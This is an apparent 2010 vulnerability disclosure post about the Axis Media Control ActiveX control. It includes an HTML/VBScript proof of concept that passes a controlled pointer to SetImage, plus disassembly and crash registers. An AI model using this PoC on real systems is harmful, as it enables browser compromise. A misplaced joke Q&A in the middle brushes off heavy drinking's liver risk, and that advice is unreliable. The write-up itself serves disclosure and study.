File:
AxisMediaControlEmb.dll
Version:
5.8.5.3
ProgID:
AxisMediaControlEmb.AxisMediaControlEmb.1
GUID:
{DE625294-70E6-45ED-B895-CFFA13AEB044}
Description:
AxisMediaControlEmb Class
Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
Proof of concept:
<html>
<object classid='clsid:DE625294-70E6-45ED-B895-CFFA13AEB044' id='test'></object>
<script language = 'vbscript'>
test.SetImage 1094795585 ,2147483646
</script>
</html>
Info (https://www.axis.com/corporate/index.htm):
Axis is an IT company offering network video solutions for professional installations.
The company is the global market leader in network video, driving the ongoing shift from analog to digital video surveillance.
Axis develops and marketing innovative network video products i.e. surveillance cameras for installations in schools, in retail, on buses and trains, and for public surveillance.
Founded in 1984.
Worldwide presence in more than 20 countries, 774 employees*.
Global partnerships through distributors, resellers and system integrators in more than 70 countries.
Net sales in 2009: SEK 2 301 M (US$340M).
Listed on NASDAQ OMX Stockholm under the ticker AXIS.
Timetable:
Mon, 14 Jun 2010 -> Vendor contacted
Mon, 14 Jun 2010 <- Vendor opened case 215039
Mon, 14 Jun 2010 <- Vendor asks more info about the vulnerable product
Mon, 14 Jun 2010 -> More info sent to the Vendor
Wed, 16 Jun 2010 -> No more info from Vendor, notified a scheduled public disclosure for Thu, 17 Jun 2010
Wed, 16 Jun 2010 <- Vendor confirmed they are working on the bug but asks more detail on how to reproduce it
Wed, 16 Jun 2010 -> Detailed bug report + proof of concept sent to Vendor
Wed, 16 Jun 2010 <- Vendor required to coordinate a public disclosure
Thu, 17 Jun 2010 -> Asked about how many time they need to patch the vulnerability
Thu, 17 Jun 2010 <- Mr Fredrik Bergstrand (technical lead for Axis Media Control) pointed me out that invalid pointer is not a security risk
Fri, 18 Jun 2010 -> Asked Mr Fredrik Bergstrand to forgive my "title mistake". Sent other details to demonstrate that code execution is possible. Renamed vulnerability in "Pointer Highjacking rather than memory corruption". I begin to doubt they've read my previous reports...
Mon, 21 Jun 2010 <- Vendor ask for a day or two for vulnerability investigation...
Wed, 23 Jun 2010 -> Requested about investigation status
Wed, 23 Jun 2010 <- Another funny answer from the Vendor
Wed, 23 Jun 2010 -> Public disclosure
Fun:
Microsoft seems to use Axis products
http://research.microsoft.com/en-us/projects/espproject/meeting-090224.jpg
Scenario:
Drinking a six-pack of beer four nights a week... with the nights spread out through the week. No other drinking or drugs involved. I also drink lots of water with lemon juice and take milk thistle every day.
For a 30-year-old male, otherwise healthy, what kind of liver damage is likely in a situation like that? I realize that everyone is different.
Answer:
Your mind is the largest factor that will ever contribute to your health. If you have a healthy mind and see yourself as being healthy, you will have a healthy body.
Beer does take a toll on your liver but so does a lot of other consumables. Your body is built to take care of itself. If you give it a break to do so and have a healthy mind, you will be a healthy person.
You like beer, great. You don't drink it every day, its a pleasure, not a habit. You give yourself a break from it and your body has a chance to stabilize itself.
If its a pleasure that isn't taking a toll on another part of your life, enjoy it. Don't worry about it. Worry is the real killer and he never gets caught.
Ops!:
Wrong scenario and wrong answer, anyway I really love who responded (ok, ok, I'm joking, always drink responsibly or rather don't drink at all... and so on...)
What happen?:
This control contains two bugs (the first one is simply a denial of service). Vulnerable functions are:
Sub GetCurrentImage (
ByVal theFormat As Long,
ByRef theBuffer As Variant,
ByRef theBufferSize As Long
)
and
Sub SetImage (
ByRef theImage As Variant,
ByRef theSize As Long
)
We'll analyze the “SetImage()” function, which is the one who is vulnerable to memory corruption.
This sub accepts two parameters; the first one (“Variant” type) is used to store something apparently unknown.
The second one just sets the size of the image to load.
Taking a closer look to the code (that starts here 0x1007A0AF and has a length of 196 bytes) it's easy to see that the real problem is here:
.text:1007A0F9
.text:1007A0F9 loc_1007A0F9: ; CODE XREF: sub_1007A0AF+41#j
.text:1007A0F9 push edi
.text:1007A0FA mov edi, [ebp+arg_4] <- theImage value
.text:1007A0FD lea eax, [ebp+ppvData] <- theSize value
.text:1007A100 push eax ; ppvData <- load theSize
.text:1007A101 push dword ptr [edi+8] ; psa <- load theImage
.text:1007A104 call ds:SafeArrayAccessData <- call oleaut32.dll
So what? Could we suppose that the ”SetImage” parameter will contain a pointer that will be passed to “SafeArraYAccessData” function? And if so, will this component check the pointer?
The answer to our first question is yes. Before answering the second one, let's take a look at Microsoft function. In fact, according to http://msdn.microsoft.com/en-us/library/ms891243.aspx
SafeArrayAccessData
This function increments the lock count of an array, and retrieves a pointer to the array data.
HRESULT SafeArrayAccessData(
SAFEARRAY FAR*
psa, void HUGEP* FAR* ppvData
);
Parameters psa [in] Pointer to an array descriptor created by SafeArrayCreate. ppvData [in] On exit, pointer to a pointer to the array data. ..
The first thing we noticed is that AxisMediaControlEmb.dll never creates an array descriptor through the “SafeArrayCreate” function:
Imported functions (ordered by address and some omissis for improve readibility):
100C8000 OpenProcessToken ADVAPI32
... ... ...
100C8354 23 SafeArrayAccessData OLEAUT32
100C8358 24 SafeArrayUnaccessData OLEAUT32
100C835C 4 SysAllocStringLen OLEAUT32
100C8360 417 OleCreatePropertyFrame OLEAUT32
100C8364 162 LoadRegTypeLib OLEAUT32
100C8368 277 VarUI4FromStr OLEAUT32
100C836C 163 RegisterTypeLib OLEAUT32
100C8370 186 UnRegisterTypeLib OLEAUT32
100C8374 161 LoadTypeLib OLEAUT32
100C8378 411 SafeArrayCreateVector OLEAUT32
100C837C 7 SysStringLen OLEAUT32
100C8380 12 VariantChangeType OLEAUT32
100C8384 9 VariantClear OLEAUT32
100C8388 10 VariantCopy OLEAUT32
100C838C 8 VariantInit OLEAUT32
100C8390 149 SysStringByteLen OLEAUT32
100C8394 150 SysAllocStringByteLen OLEAUT32
100C8398 2 SysAllocString OLEAUT32
100C839C 6 SysFreeString OLEAUT32
100C83A0 200 GetErrorInfo OLEAUT32
100C83A4 146 DispCallFunc OLEAUT32
100C83AC ShellExecuteExA SHELL32
... ... ...
anyway, from oleaut32.dll:
.text:6FC4E38C mov esi, [ebp+ppvData] <- theSize value
.text:6FC4E38F test esi, esi
.text:6FC4E391 jz loc_6FC67C94
.text:6FC4E397 mov edx, [ebp+psa]
.text:6FC4E39A push edx ; psa <- theImage value
.text:6FC4E39B call _SafeArrayLock@4 <- call oleaut32.dll
then (always oleaut32.dll):
.text:6FC4E14A mov edi, edi
.text:6FC4E14C push ebp
.text:6FC4E14D mov ebp, esp
.text:6FC4E14F mov ecx, [ebp+psa]
.text:6FC4E152 test ecx, ecx
.text:6FC4E154 jz loc_6FC67C76
.text:6FC4E15A mov eax, [ecx+8] <- CRASH
and could you imagine what will be EAX value? Here it is:
EAX 0012DE5C
ECX 41414141 <-------- mov eax, [ecx+8]
EDX 018C64C8
EBX 018C64AC
ESP 0012DE30
EBP 0012DE60
ESI 41414141
EDI 0012DE5C
Note that "41414141" is just the hexadecimal value of 1094795585, passed to theImage parameter, as follow:
<html>
<object classid='clsid:DE625294-70E6-45ED-B895-CFFA13AEB044' id='test'></object>
<script language = 'vbscript'>
test.SetImage 1094795585 ,2147483646
</script>
</html>
Be safe...
Nessun commento:
Posta un commento